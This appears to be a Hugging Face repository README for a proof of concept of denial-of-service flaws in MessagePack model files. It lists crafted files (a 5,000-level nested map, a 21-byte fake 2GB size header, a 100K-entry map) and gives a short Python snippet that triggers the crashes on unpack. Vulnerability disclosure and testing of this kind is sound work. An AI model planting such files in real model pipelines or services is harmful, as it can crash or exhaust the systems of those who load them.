WolfpackArmy
/

msgpack-dos-poc

Model card Files Files and versions

msgpack-dos-poc / README.md

WolfpackArmy's picture

Upload folder using huggingface_hub

ca45a04 verified 6 days ago

|

history blame contribute delete

777 Bytes

MessagePack Model File Vulnerability PoC

Vulnerability

DoS via Deep Nesting Stack Overflow, OOM Bomb, and CPU Exhaustion in MessagePack model files

Files

poc_deep_nest.msgpack — 5,000 levels of nested maps, causes stack overflow on unpack
poc_oom_bomb.msgpack — 21 bytes, bin32 header claiming ~2GB allocation
poc_huge_map.msgpack — 100K key-value pairs, causes CPU/memory exhaustion
benign.msgpack — Clean file for comparison

Reproduce

import msgpack
# Stack overflow from deep nesting:
with open('poc_deep_nest.msgpack', 'rb') as f:
    msgpack.unpackb(f.read())  # RecursionError / crash

# OOM from fake size header:
with open('poc_oom_bomb.msgpack', 'rb') as f:
    msgpack.unpackb(f.read())  # Attempts ~2GB allocation